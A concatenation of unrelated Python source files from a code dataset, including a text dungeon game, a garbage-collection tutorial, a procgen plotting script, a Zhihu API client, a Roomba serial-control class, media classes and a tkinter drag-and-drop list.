\"!\\n\", sep='')\n return 0\n else:\n print(\"You killed 
Zombie \", num + 1, \"!\\n\", sep='')\n return 1\n\ndef store_loot(hero, treasure):\n \"\"\"Stores any treasures found by the hero in his loot bag\"\"\"\n loot = hero.loot\n treasure_item = treasure.description\n\n ct = loot.get(treasure_item)\n if (ct):\n print(\"You found another\", treasure_item)\n loot[treasure_item] = ct + 1\n else:\n if ['a','e','i','o','u'].count(treasure_item[0]):\n print(\"You found an\", treasure_item)\n else:\n print(\"You found a\", treasure_item)\n loot[treasure_item] = 1\n\ndef exit_dungeon(room_title):\n \"\"\"Allows the user to leave a dungeon\"\"\"\n print(\"Leaving \", room_title, \"....\", sep='')\n input(\"Press Enter to continue...\")\n clear_screen()\n outside_dungeon.display_game_title()\n outside_dungeon.display_menu()\n\ndef enter_dungeon(quest_map, hero, room_no):\n \"\"\"Make a grand entrance in a dungeon\"\"\"\n rooms = quest_map.rooms\n rooms_left = quest_map.rooms_left\n room = rooms[room_no - 1]\n zombies = room.zombies\n is_treasure = 0\n\n zombie_ct = len(zombies)\n clear_screen()\n print(get_title_display(room_no))\n\n if (zombie_ct == 1):\n print(\"\\nThere is only 1 zombie to defeat\")\n else:\n print(\"\\nThere are\", zombie_ct, \"zombies to defeat\")\n\n if (len(rooms_left[room_no - 1]) == 3):\n print(\"This room has a treasure!\")\n is_treasure = 1\n\n show_menu()\n choice = input(\"Enter [command]: \")\n choice_cap = choice.upper()\n\n while (choice_cap != 'Z' and choice_cap != 'A'\n and choice_cap != 'H' and choice_cap != 'M'\n and choice_cap != 'Q' and choice_cap != 'L'):\n choice = input(\"Enter [command]: \")\n choice_cap = choice.upper()\n\n while (choice_cap != 'Q'):\n menu_items = {'H': outside_dungeon.display_health_stats,\n 'Z': show_zombie_stats, 'M': show_menu, 'A': attack_zombies,\n 'L': outside_dungeon.display_loot_bag}\n func = menu_items.get(choice_cap)\n if (not func):\n print(\"Invalid Command!\")\n else:\n if (choice_cap == 'Z'):\n func(zombies)\n elif (choice_cap == 'H' or choice_cap == 'L'):\n func(hero)\n elif (choice_cap == 'A'):\n attack_result = func(hero, zombies)\n if (attack_result == 1):\n rooms_left[room_no - 1][1] = 0\n print(\"You have cleared Room #\", room_no, \" '\",\n room.title, \"'\", sep='')\n if (is_treasure):\n store_loot(hero, rooms_left[room_no - 1][2])\n else:\n print(\"You were no match to the zombies in\", room.title)\n exit_dungeon(room.title)\n return attack_result\n else:\n func()\n\n choice = input(\"Enter [command]: \")\n choice_cap = choice.upper()\n exit_dungeon(room.title)\n\ndef get_title_display(room_no):\n \"\"\"Controls the list of room titles to display during the game\"\"\"\n titles = [\n \"\"\"\n _____ _ _\n |__ /___ ___ | |_ ___ _ __ (_) __ _\n / // _ \\ / _ \\| __/ _ \\| '_ \\| |/ _` |\n / /| (_) | (_) | || (_) | |_) | | (_| |\n /____\\___/ \\___/ \\__\\___/| .__/|_|\\__,_|\n |_|\"\"\",\n \"\"\"\n _ _ _ _\n / \\ _ __ ___ _ __ __| | ___| | | ___\n / _ \\ | '__/ _ \\ '_ \\ / _` |/ _ \\ | |/ _ \\ \n / ___ \\| | | __/ | | | (_| | __/ | | __/\n /_/ \\_\\_| \\___|_| |_|\\__,_|\\___|_|_|\\___|\"\"\",\n \"\"\"\n ____ __ __ __ _\n / ___|__ ___ _____ ___ / _| \\ \\ / /__ _ __ __| | ___ _ __ ___ \n | | / _` \\ \\ / / _ \\ / _ \\| |_ \\ \\ /\\ / / _ \\| '_ \\ / _` |/ _ \\ '__/ __|\n | |__| (_| |\\ V / __/ | (_) | _| \\ V V / (_) | | | | (_| | __/ | \\__ \\ \n \\____\\__,_| \\_/ \\___| \\___/|_| \\_/\\_/ \\___/|_| |_|\\__,_|\\___|_| |___/\"\"\",\n \"\"\"\n _ _ _ _\n | \\ | | _____ _____ _ __| | __ _ _ __ __| |\n | \\| |/ _ \\ \\ / / _ \\ '__| |/ _` | '_ \\ / _` |\n | |\\ | __/\\ V / 
__/ | | | (_| | | | | (_| |\n |_| \\_|\\___| \\_/ \\___|_| |_|\\__,_|_| |_|\\__,_|\"\"\",\n \"\"\"\n _____ _\n |_ _|__ ___ _ __ | |_ _____ ___ __\n | |/ _ \\ / _ \\| '_ \\| __/ _ \\ \\ /\\ / / '_ \\ \n | | (_) | (_) | | | | || (_) \\ V V /| | | |\n |_|\\___/ \\___/|_| |_|\\__\\___/ \\_/\\_/ |_| |_|\"\"\",\n \"\"\"\n ____ _ _ _ _ _ _\n | _ \\(_)_ _(_) ___ | | | | ___ | | | _____ __\n | |_) | \\ \\/ / |/ _ \\ | |_| |/ _ \\| | |/ _ \\ \\ /\\ / /\n | __/| |> <| | __/ | _ | (_) | | | (_) \\ V V /\n |_| |_/_/\\_\\_|\\___| |_| |_|\\___/|_|_|\\___/ \\_/\\_/\"\"\",\n \"\"\"\n _____ _ ____ _ _ ___ _\n |_ _| |__ ___ / ___| ___ _ _| |_| |__ ___ _ __ _ __ |_ _|___| | ___ ___\n | | | '_ \\ / _ \\ \\___ \\ / _ \\| | | | __| '_ \\ / _ \\ '__| '_ \\ | |/ __| |/ _ \\/ __|\n | | | | | | __/ ___) | (_) | |_| | |_| | | | __/ | | | | | | |\\__ \\ | __/\\__ \\ \n |_| |_| |_|\\___| |____/ \\___/ \\__,_|\\__|_| |_|\\___|_| |_| |_| |___|___/_|\\___||___/\"\"\",\n \"\"\"\n __ __ _ _ _\n \\ \\ / /__ _ __ __| | ___ _ __| | __ _ _ __ __| |\n \\ \\ /\\ / / _ \\| '_ \\ / _` |/ _ \\ '__| |/ _` | '_ \\ / _` |\n \\ V V / (_) | | | | (_| | __/ | | | (_| | | | | (_| |\n \\_/\\_/ \\___/|_| |_|\\__,_|\\___|_| |_|\\__,_|_| |_|\\__,_|\"\"\",\n \"\"\"\n ____ _ _ _____ _ _\n | _ \\ __ _ _ __ __ _ __| (_)___ ___ | ___|_ _| | |___\n | |_) / _` | '__/ _` |/ _` | / __|/ _ \\ | |_ / _` | | / __|\n | __/ (_| | | | (_| | (_| | \\__ \\ __/ | _| (_| | | \\__ \\ \n |_| \\__,_|_| \\__,_|\\__,_|_|___/\\___| |_| \\__,_|_|_|___/\"\"\",\n \"\"\"\n _____ _ _ _ _____ _\n | ____|_ __ ___| |__ __ _ _ __ | |_ ___ __| | | ___|__ _ __ ___ ___| |_\n | _| | '_ \\ / __| '_ \\ / _` | '_ \\| __/ _ \\/ _` | | |_ / _ \\| '__/ _ \\/ __| __|\n | |___| | | | (__| | | | (_| | | | | || __/ (_| | | _| (_) | | | __/\\__ \\ |_\n |_____|_| |_|\\___|_| |_|\\__,_|_| |_|\\__\\___|\\__,_| |_| \\___/|_| \\___||___/\\__|\"\"\"]\n\n return titles[room_no - 1]\n\ndef clear_screen():\n \"\"\"Clears the screen\"\"\"\n osname = os.name\n if osname == 'posix':\n os.system('clear')\n elif osname == 'nt' or osname == 'dos':\n os.system('cls')\n else:\n print(\"\\n\" * 30)\n","sub_path":"inside_dungeon.py","file_name":"inside_dungeon.py","file_ext":"py","file_size_in_byte":11825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"267691388","text":"'''\r\nDestroying Objects (Garbage Collection):\r\nPython deletes unneeded objects (built-in types or class instances)\r\nautomatically to free the memory space. The process by which Python\r\nperiodically reclaims blocks of memory that no longer are in use is\r\ntermed as Garbage Collection. Python's garbage collector runs during\r\nprogram execution and is triggered when an object's reference count\r\nreaches zero. An object's reference count changes as the number of\r\naliases that point to it changes. An object's reference count\r\nincreases when it is assigned a new name or placed in a container\r\n(list, tuple, or dictionary). The object's reference count decreases\r\nwhen it is deleted with del, its reference is reassigned, or its\r\nreference goes out of scope. When an object's reference count\r\nreaches zero, Python collects it automatically.\r\n'''\r\n\r\na = 40 # Create object <40>\r\nb = a # Increase ref. count of <40>\r\nc = [b] # Increase ref. count of <40>\r\n\r\ndel a # Decrease ref. count of <40>\r\nb = 100 # Decrease ref. count of <40>\r\nc[0] = -1 # Decrease ref. 
count of <40>\r\n\r\n'''\r\nYou normally will not notice when the garbage collector destroys an orphaned\r\ninstance and reclaims its space. However, a class can implement the special\r\nmethod __del__(), called a destructor, that is invoked when the instance is\r\nabout to be destroyed. This method might be used to clean up any non-memory\r\nresources used by an instance.\r\n'''\r\n","sub_path":"Area52/OO/Garbage_colletion.py","file_name":"Garbage_colletion.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"645388169","text":"#!/usr/bin/env python3\n\"\"\"\nph3fn=\"pyhook-1.6.1-cp35-cp35m-win32.whl\"\nph3downdir=\"\\\\$ph3fn\"\nph3downlink=\"https://files.pythonhosted.org/packages/00/36/c08af743a671d94da7fe10ac2d078624f3efc09273ffae7b18601a8414fe/PyHook3-1.6.1-cp35-win32.whl\"\ncurl -o \"$ph3fn\" \"$ph3downlink\"\n\"\"\"\nimport os, sys, threading\nimport subprocess\nimport _thread\nfrom FN33andlib import *\nfrom functools import partial\n\ndir0 = os.path.dirname(os.path.realpath(__file__))\ntextclick = 0\npause = 0\nis_recording = 0\nlinuxpc = 1\ndef Default():\n # reset the module-level flags (the original assigned locals, which had no effect)\n global textclick, pause, is_recording\n textclick = 0\n pause = 0\n is_recording = 0\nDefault()\ndef checkdep():\n # the original built a one-element list and discarded the split(); split the string instead\n deplist = \"pyautogui pyuserinput\".split()\n if sys.platform in ['linux', 'linux2']:\n callpip = \"pip3\"\n if sys.platform in ['Windows', 'win32', 'cygwin']:\n callpip = \"pip\"\n for f in deplist:\n subprocess.call(callpip + \" install \" + str(f), shell=True)\n#checkdep()\ndef MouseGetPos():\n if sys.platform in ['linux', 'linux2']:\n from Xlib import display # python-xlib; assumed to be the intended provider of 'display'\n screenroot = display.Display().screen().root\n pointer = screenroot.query_pointer()\n data = pointer._data\n x = data[\"root_x\"]\n y = data[\"root_y\"]\n return x, y\n if sys.platform in ['Windows', 'win32', 'cygwin']:\n pass\n\n# Windows-only imports: these fail on other platforms\nimport win32api, win32con\nimport win32com.client as comclt\nwsh = comclt.Dispatch(\"WScript.Shell\")\n\"\"\"\nwsh.AppActivate(\"Notepad\") # select another application\nwsh.AppActivate(\"%USERPROFILE%\\\\Documents\\\\Docs\\\\Automate\\\\FiiNoteWINE\\\\FiiNote.exe\")\nfocusprog(\"FiiNote\")\n\"\"\"\n","sub_path":"fextr/1testfextr.py","file_name":"1testfextr.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"290964276","text":"#!/usr/bin/env python\nimport argparse\n\nfrom procgen.interactive import ProcgenInteractive\nfrom procgen import ProcgenEnv\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass HeistppStatePlotter():\n\n def __init__(self, world_dim, plot_interval):\n self.world_dim = world_dim\n self.plot_interval = plot_interval\n\n self.fig, self.axs = plt.subplots(2, 1)\n plt.ion()\n plt.show()\n self.reward = []\n self.episode_return = []\n\n self.map = None\n\n\n def __call__(self, obs, rew, done, info, episode_steps, episode_return):\n\n # The state of each cell is encoded as follows:\n # {100:'empty',51:'wall',21:'fire',20:'water',9:'exit',2:'key',1:'door'}\n if self.map is None:\n self.map = {}\n for i, v in enumerate(sorted(np.unique(info['state'][7:]))):\n self.map[v] = i\n\n if not episode_steps % self.plot_interval:\n\n world = np.array([self.map[v] for v in info['state'][7:]])\n world = world.reshape(self.world_dim,self.world_dim)\n self.axs[0].clear()\n self.axs[0].imshow(world)\n agent_x, agent_y = (info['state'][0] % self.world_dim), (info['state'][0] // self.world_dim)\n self.axs[0].plot(agent_x,agent_y,'ko')\n self.axs[0].invert_yaxis()\n\n\n self.axs[1].clear()\n self.reward.append(rew)\n
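 # track the running episode return next to the per-step reward so both\n # series can be drawn on the same axes below\n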
 self.episode_return.append(episode_return)\n self.axs[1].plot(self.reward)\n self.axs[1].plot(self.episode_return)\n\n plt.draw()\n self.fig.canvas.draw_idle()\n self.fig.canvas.start_event_loop(0.1)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--vision\", choices=[\"agent\", \"human\"], default=\"human\")\n parser.add_argument(\"--record-dir\", help=\"directory to record movies to\")\n parser.add_argument(\"--distribution-mode\", default=\"hard\", help=\"which distribution mode to use for the level generation\")\n parser.add_argument(\"--level-seed\", type=int, help=\"select an individual level to use\")\n parser.add_argument(\"--use-generated-assets\", help=\"using autogenerated assets\", choices=[\"yes\",\"no\"], default=\"no\")\n args = parser.parse_args()\n\n kwargs = {\"distribution_mode\": args.distribution_mode}\n kwargs[\"use_generated_assets\"] = (args.use_generated_assets == \"yes\")\n\n if args.level_seed is not None:\n kwargs[\"start_level\"] = args.level_seed\n kwargs[\"num_levels\"] = 1\n\n world_dim = int(10)\n kwargs[\"additional_info_spaces\"] = [ProcgenEnv.C_Space(\"state\", False, (7+world_dim*world_dim,), bytes, (0,255))]\n\n kwargs[\"options\"] = {\n 'world_dim':world_dim,\n 'wall_chance':0.5,\n 'fire_chance':0.3,\n 'water_chance':0.2,\n 'num_keys':int(2),\n 'num_doors':int(1),\n 'with_grid_steps':True,\n 'completion_bonus':10.0,\n 'fire_bonus':-5.0,\n 'water_bonus':-2.0,\n 'action_bonus':-1.0,\n }\n\n ia = ProcgenInteractive(args.vision, True, env_name=\"heistpp\", **kwargs)\n\n ia.skip_info_out(\"state\")\n\n step_cb = HeistppStatePlotter(world_dim, 1)\n\n ia.add_step_callback(step_cb)\n\n\n ia.run(record_dir=args.record_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"procgen/examples/play_heistpp.py","file_name":"play_heistpp.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46476350","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\zhihu\\models\\zhihux.py\n# Compiled at: 2017-07-25 02:41:35\n# Size of source mod 2**32: 6144 bytes\n\"\"\"\nCommon operations live in this module.\n\"\"\"\nimport logging\n
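# Usage sketch (hypothetical, inferred from the method signatures below):\n# client = ZhihuX(); client.follow(user_slug='xiaoxiaodouzi')\n# Construction details depend on the parent Zhihu class, which is not shown\n# here; need_login is assumed to enforce an authenticated session.\n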
from . import Zhihu\nfrom ..auth import need_login\nfrom ..error import ZhihuError\nfrom ..url import URL\n\nclass ZhihuX(Zhihu):\n\n @need_login\n def send_message(self, content, user_id=None, profile_url=None, user_slug=None, **kwargs):\n \"\"\"\n Send a private message to the specified user.\n :param content: the message content\n :param user_id: the user's id\n :param profile_url: the url of the user's profile page\n :param user_slug: the user's personalized domain name (slug)\n\n >>> send_message(profile_url = \"https://www.zhihu.com/people/xiaoxiaodouzi\")\n >>> send_message(user_slug = \"xiaoxiaodouzi\")\n >>> send_message(user_id = \"1da75b85900e00adb072e91c56fd9149\")\n \"\"\"\n if not any([user_id, profile_url, user_slug]):\n raise ZhihuError('Specify at least one keyword argument')\n else:\n if user_id is None:\n user_slug = self._user_slug(profile_url) if user_slug is None else user_slug\n user_id = self._user_id(user_slug)\n data = {'type':'common', 'content':content, 'receiver_hash':user_id}\n response = self._session.post(URL.message(), json=data, **kwargs)\n if response.ok:\n return response.json()\n self.log('Sending failed')\n raise ZhihuError('Operation failed: %s' % response.text)\n\n @need_login\n def user(self, user_slug=None, profile_url=None, **kwargs):\n \"\"\"\n Get a user's profile information.\n :param user_slug: the user's personalized domain name (slug)\n :param profile_url: the url of the user's profile page\n\n :return: dict\n\n >>> user(profile_url = \"https://www.zhihu.com/people/xiaoxiaodouzi\")\n >>> user(user_slug = \"xiaoxiaodouzi\")\n\n \"\"\"\n if not any([profile_url, user_slug]):\n raise ZhihuError('Specify at least one keyword argument')\n user_slug = self._user_slug(profile_url) if user_slug is None else user_slug\n response = self._session.get(URL.profile(user_slug), **kwargs)\n if response.ok:\n return response.json()\n raise ZhihuError('Operation failed: %s' % response.text)\n\n @need_login\n def follow(self, user_slug=None, profile_url=None, **kwargs):\n \"\"\"\n Follow a user.\n :param user_slug:\n :param profile_url:\n :return: {\"follower_count\": int}\n\n >>> follow(profile_url = \"https://www.zhihu.com/people/xiaoxiaodouzi\")\n >>> follow(user_slug = \"xiaoxiaodouzi\")\n \"\"\"\n if not any([profile_url, user_slug]):\n raise ZhihuError('Specify at least one keyword argument')\n user_slug = self._user_slug(profile_url) if user_slug is None else user_slug\n response = self._session.post(URL.follow_people(user_slug), **kwargs)\n if response.ok:\n data = response.json()\n data['followed'] = True\n return data\n raise ZhihuError('Operation failed: %s' % response.text)\n\n @need_login\n def unfollow(self, user_slug=None, profile_url=None, **kwargs):\n \"\"\"\n Unfollow a user.\n :param user_slug:\n :param profile_url:\n :return: {\"follower_count\": int}\n\n >>> unfollow(profile_url = \"https://www.zhihu.com/people/xiaoxiaodouzi\")\n >>> unfollow(user_slug = \"xiaoxiaodouzi\")\n \"\"\"\n if not any([profile_url, user_slug]):\n raise ZhihuError('Specify at least one keyword argument')\n user_slug = self._user_slug(profile_url) if user_slug is None else user_slug\n response = self._session.delete(URL.follow_people(user_slug), **kwargs)\n if response.ok:\n data = response.json()\n data['followed'] = False\n return data\n raise ZhihuError('Operation failed: %s' % response.text)\n\n @need_login\n def followers(self, user_slug=None, profile_url=None, limit=20, offset=0, **kwargs):\n \"\"\"\n Get a user's follower list.\n :param user_slug:\n :param profile_url:\n :param limit: maximum number of results to return\n :param offset: pagination cursor\n :param kwargs:\n :return:\n
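 The structure below is a sample response captured from the API; the field\n values are illustrative only. The paging object reports is_start/is_end, so\n a next page can presumably be fetched by calling followers() again with\n offset=offset+limit (inferred from the parameters, not documented).\n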
\"http://www.zhihu.com/api/v4/people/0fcb310a722c5bb99d864ace7bb2d89c\",\n \"url_token\": \"open\",\n \"user_type\": \"people\",\n \"answer_count\": 50,\n \"headline\": \"上知乎,恍然大悟!\",\n \"avatar_url\": \"https://pic1.zhimg.com/fdbce7544_is.jpg\",\n \"is_org\": false,\n \"gender\": 1,\n \"follower_count\": 78,\n \"type\": \"people\",\n \"id\": \"0fcb310a722c5bb99d864ace7bb2d89c\"\n },\n ]\n }\n \"\"\"\n if not any([profile_url, user_slug]):\n raise ZhihuError('至少指定一个关键字参数')\n user_slug = self._user_slug(profile_url) if user_slug is None else user_slug\n r = (self._session.get)(URL.followers(user_slug), params={'limit':limit, \n 'offset':offset}, **kwargs)\n self.log(r.url)\n if r.ok:\n return r.json()\n self.log(('status code %s, body: %s' % (r.status_code, r.text)), level=(logging.ERROR))\n raise ZhihuError('操作失败:%s' % r.text)","sub_path":"pycfiles/zhihu-0.2.6-py3.6/zhihux.cpython-36.py","file_name":"zhihux.cpython-36.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"271296599","text":"import serial\r\nimport time\r\n\r\n\"\"\"\r\nCOMMAND LIST:\r\n-------------------------\r\n0 HALT: stops movement,\r\n no arguemnts required\r\n1 FORWARD: moves forward at a constant default speed (200m/s),\r\n no arguments required\r\n2 VARIFOR: moves forward at a variable speed,\r\n 1 arguments: desired speed (1-500mm/s)\r\n3 BACKWARD: moves backward at a constant default speed (200mm/s),\r\n no arguments required\r\n4 VARIBACK: moves backward at a variable speed,\r\n 1 arguments: desired speed (-1 - (-500)mm/s)\r\n5 LEFTTURN: pivots to the left at a constant speed (200mm/s),\r\n no arguments required\r\n6 RIGHTTURN: pivots to the right at a constant speed (200mm/s),\r\n no arguments required\r\n7 VEERLEFT: drives forward at a constant rate (200mm/s)\r\n and constant arc(500mm) to the left\r\n no arguments required\r\n8 VARIVEERL: drives forward at a variable rate and arc to the left\r\n 2 arguments: speed (1-500mm/s) and arc (0-2000mm)\r\n9 VEERRIGHT: drives forward at a constant rate (200mm/s)\r\n and constant arc(500mm) to the right\r\n no arguments required\r\n10 VARIVEERR: drives forward at a variable rate and arc to the right\r\n 2 arguments required: speed (1-500mm/s) and arc (-1 - (-2000)mm)\r\n11 DIRECTM: Drives each motor at an independant speed\r\n 2 arguments: speed of left wheel and right wheel (-500 - 500mm/s)\r\n12 POLLDATA: Polls IR sensor data from the Roomba, returns a list of\r\n sensor data in order from left side to right\r\n13 SERVO: Moves the Kinect's Servo into the desired angle. 
Straight ahead is ~90 degrees\r\n 1 argument: angle desired\r\n Give it a sec to get to its place\r\n\r\n\"\"\"\r\nclass LBAR:\r\n global SINGLE_COMMANDS\r\n global MULTI_PART_COMMANDS\r\n global POLLDATA\r\n global SERVO\r\n global LPACKET\r\n global LFPACKET\r\n global LCPACKET\r\n global RCPACKET\r\n global RFPACKET\r\n global RPACKET\r\n \r\n SINGLE_COMMANDS = (0, 1, 3, 5, 6, 7, 9)\r\n MULTI_PART_COMMANDS = (2, 4, 8, 10, 11)\r\n POLLDATA = 12\r\n SERVO = 13\r\n LPACKET = 0\r\n LFPACKET = 0\r\n LCPACKET = 0\r\n RCPACKET = 0\r\n RFPACKET = 0\r\n RPACKET = 0\r\n \r\n def __init__(self, portname=\"/dev/rfcomm0\", baud=9600):\r\n self.portname = portname\r\n self.baud = baud\r\n\r\n global ser\r\n ser = serial.Serial(self.portname, baudrate=self.baud)\r\n \r\n \r\n \r\n #Takes in the arguments for speeds and arcs and such and\r\n #converts each into a series of two bytes, then sends back\r\n #a list containing the high byte and low byte of each in\r\n #order\r\n def _getbytes(self, *args):\r\n arglist = []\r\n args = args[0]\r\n \r\n for i in range(len(args)):\r\n hexval = hex(args[i])[2:]\r\n \r\n if len(hexval) == 4:\r\n hexvalhigh = int(hexval[:2], 16)\r\n hexvallow = int(hexval[2:], 16)\r\n \r\n elif len(hexval) == 3:\r\n hexvalhigh = int ('0' + hexval[:1], 16)\r\n hexvallow = int(hexval[1:], 16)\r\n else:\r\n hexvalhigh = 0\r\n hexvallow = int(hexval, 16)\r\n \r\n arglist.append(hexvalhigh)\r\n arglist.append(hexvallow)\r\n print(\"HEXVALHIGH \", hexvalhigh)\r\n print(\"HEXVALLOW \", hexvallow) \r\n \r\n return arglist\r\n \r\n\r\n #For commands in SINGLE_COMMANDS, there should\r\n #only be one argument, the actual command, which is then\r\n #sent off on its own. For MULTI_PART_COMMANDS, the arguments\r\n #should be the command follows by either one or two arguments.\r\n #single arguments should be requested speed, multi arguments\r\n #should either be the speed and arc, or speed of each wheel\r\n #for command 11\r\n def send(self, *args):\r\n \r\n command = args[0]\r\n \r\n \r\n if command in SINGLE_COMMANDS:\r\n ser.write(bytearray((command, 0, 0, 0, 0)))\r\n return 0\r\n \r\n elif command == SERVO:\r\n angle = args[1]\r\n if angle >= 0 and angle <= 180:\r\n ser.write(bytearray((command, angle, 0, 0, 0)))\r\n return 0\r\n \r\n elif command in MULTI_PART_COMMANDS:\r\n arglist = self._getbytes(args[1:])\r\n if command == 13:\r\n arglist = arglist[::-1]\r\n ser.write(bytearray(tuple([command] + arglist)))\r\n return 0\r\n \r\n elif command == POLLDATA:\r\n ser.write(bytearray((command, 0, 0, 0, 0)))\r\n time.sleep(.1)\r\n \r\n #This reads in the information from the roomba\r\n #each sensor value will come as a string 4 char's\r\n #long (hence reading in 4 bytes each), and the int()\r\n #will then convert the string into an integer\r\n LPACKET = int(ser.read(4))\r\n LFPACKET = int(ser.read(4))\r\n LCPACKET = int(ser.read(4))\r\n RCPACKET = int(ser.read(4))\r\n RFPACKET = int(ser.read(4))\r\n RPACKET = int(ser.read(4))\r\n \r\n \r\n return (LPACKET, LFPACKET, LCPACKET,\r\n RCPACKET, RFPACKET, RPACKET)\r\n \r\n \r\n \r\n","sub_path":"LBAR_Class.py","file_name":"LBAR_Class.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345540380","text":"class Media(object):\n '''\n All the different media types must be subclasses of this general information\n class.\n '''\n \n def __init__(self, title, synopsis, poster_image, trailer, director, year):\n self.title = title\n self.synopsis = synopsis\n 
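# An alternative to the hex-string slicing in _getbytes in the LBAR record
# above, sketched with divmod; the 0xFFFF mask is an assumption added so the
# negative speeds and arcs the command table allows also pack into two bytes
# (hex(value)[2:] breaks on negative inputs):
#     def split_word(value):
#         high, low = divmod(value & 0xFFFF, 256)
#         return [high, low]
#     split_word(300)   # [1, 44]   == 0x012C
#     split_word(-500)  # [254, 12] == 0xFE0C (two's complement)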
self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer\n self.director = director\n self.release_year = year\n self.cast_members = []\n\n def show_trailer(self):\n # imported here because this module has no top-level imports\n import webbrowser\n webbrowser.open(self.trailer_youtube_url)\n \n # Cast is added outside of the constructor due to movies and TV Shows having\n # different cast sizes.\n def add_cast_member(self, cast_member):\n self.cast_members.append(cast_member)\n \n def remove_cast_member(self, cast_member):\n if cast_member in self.cast_members:\n self.cast_members.remove(cast_member)\n\nclass Movie(Media):\n '''Class for Movie creation'''\n \n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\", \"NC-17\"]\n \n def __init__(self, title, synopsis, poster_image, trailer, director, year,\n movie_rating):\n super(Movie, self).__init__(title, synopsis, poster_image, trailer,\n director, year)\n # Only include rating of movie if it is a valid one\n if movie_rating not in self.VALID_RATINGS:\n self.rating = ''\n else:\n self.rating = movie_rating\n\nclass Tv_Show(Media):\n '''Class for TV Show creation'''\n \n VALID_RATINGS = [\"TV-Y\", \"TV-Y7\", \"TV-G\", \"TV-PG\", \"TV-14\", \"TV-MA\"]\n \n def __init__(self, title, synopsis, poster_image, trailer, director, year,\n tv_rating, season, episodes, tv_station):\n super(Tv_Show, self).__init__(title, synopsis, poster_image, trailer,\n director, year)\n # Only include rating of TV show if it is a valid one\n if tv_rating not in self.VALID_RATINGS:\n self.rating = ''\n else:\n self.rating = tv_rating\n self.season = season\n self.episodes = episodes\n self.tv_station = tv_station\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"226630871","text":"# version: 0.3\n# Author: Miguel Martinez Lopez\n\ntry:\n from ttk import Frame\nexcept ImportError:\n from tkinter.ttk import Frame\n\n# Python 3 support\ntry:\n basestring\nexcept NameError:\n basestring = str\n\nclass Item(Frame):\n def __init__(self, master, value, width, height, selection_handler=None, drag_handler = None, drop_handler=None, **kwargs):\n\n kwargs.setdefault(\"class_\", \"Item\")\n Frame.__init__(self, master, **kwargs)\n \n self._x = None\n self._y = None\n \n self._width = width\n self._height = height\n\n self._tag = \"item%s\"%id(self)\n self._value = value\n\n self._selection_handler = selection_handler\n self._drag_handler = drag_handler\n self._drop_handler = drop_handler\n\n @property\n def x(self):\n return self._x\n \n @property\n def y(self):\n return self._y\n \n @property\n def width(self):\n return self._width\n\n @property\n def height(self):\n return self._height\n \n @property\n def value(self):\n return self._value\n \n def init(self, container, x, y):\n self._x = x\n self._y = y\n\n self.place(in_=container, x=x, y=y, width=self._width, height=self._height)\n\n self.bind_class(self._tag, \"<ButtonPress-1>\", self._on_selection)\n self.bind_class(self._tag, \"<B1-Motion>\", self._on_drag)\n self.bind_class(self._tag, \"<ButtonRelease-1>\", self._on_drop)\n\n self._add_bindtag(self)\n \n # Python3 compatibility: dict.values() return a view\n list_of_widgets = list(self.children.values())\n while len(list_of_widgets) != 0:\n widget = list_of_widgets.pop()\n list_of_widgets.extend(widget.children.values())\n \n self._add_bindtag(widget)\n \n def _add_bindtag(self, widget):\n bindtags = widget.bindtags()\n if self._tag not in bindtags:\n widget.bindtags((self._tag,) + bindtags)\n\n def _on_selection(self, event):\n 
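# A construction sketch for the Media/Movie classes in the media.py record
# above; the title, URL, poster and cast values are placeholders:
#     movie = Movie('Toy Story', 'A cowboy doll is sidelined by a new spaceman toy.',
#                   'poster.jpg', 'https://youtu.be/...', 'John Lasseter', 1995, 'G')
#     movie.add_cast_member('Tom Hanks')
# A rating outside VALID_RATINGS would be stored as the empty string.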
self.tkraise()\n\n self._move_lastx = event.x_root\n self._move_lasty = event.y_root\n \n if self._selection_handler:\n self._selection_handler(self)\n\n def _on_drag(self, event):\n self.master.update_idletasks()\n \n cursor_x = self._x + event.x\n cursor_y = self._y + event.y\n\n self._x += event.x_root - self._move_lastx\n self._y += event.y_root - self._move_lasty\n\n self._move_lastx = event.x_root\n self._move_lasty = event.y_root\n\n self.place_configure(x=self._x, y=self._y)\n\n if self._drag_handler:\n self._drag_handler(cursor_x, cursor_y)\n \n def _on_drop(self, event):\n if self._drop_handler:\n self._drop_handler()\n \n def set_position(self, x,y):\n self._x = x\n self._y = y\n self.place_configure(x =x, y =y)\n \n def move(self, dx, dy):\n self._x += dx\n self._y += dy\n\n self.place_configure(x =self._x, y =self._y)\n\nclass DDList(Frame):\n def __init__(self, master, item_width, item_height, item_relief=None, item_borderwidth=None, item_padding=None, item_style=None, offset_x=0, offset_y=0, gap=0, **kwargs):\n kwargs[\"width\"] = item_width+offset_x*2\n kwargs[\"height\"] = offset_y*2\n\n Frame.__init__(self, master, **kwargs)\n\n self._item_borderwidth = item_borderwidth\n self._item_relief = item_relief\n self._item_padding = item_padding\n self._item_style= item_style\n self._item_width = item_width\n self._item_height = item_height\n \n self._offset_x = offset_x\n self._offset_y = offset_y\n \n self._left = offset_x\n self._top = offset_y\n self._right = self._offset_x + self._item_width\n self._bottom = self._offset_y\n\n self._gap = gap\n\n self._index_of_selected_item = None\n self._index_of_empty_container = None\n\n self._list_of_items = 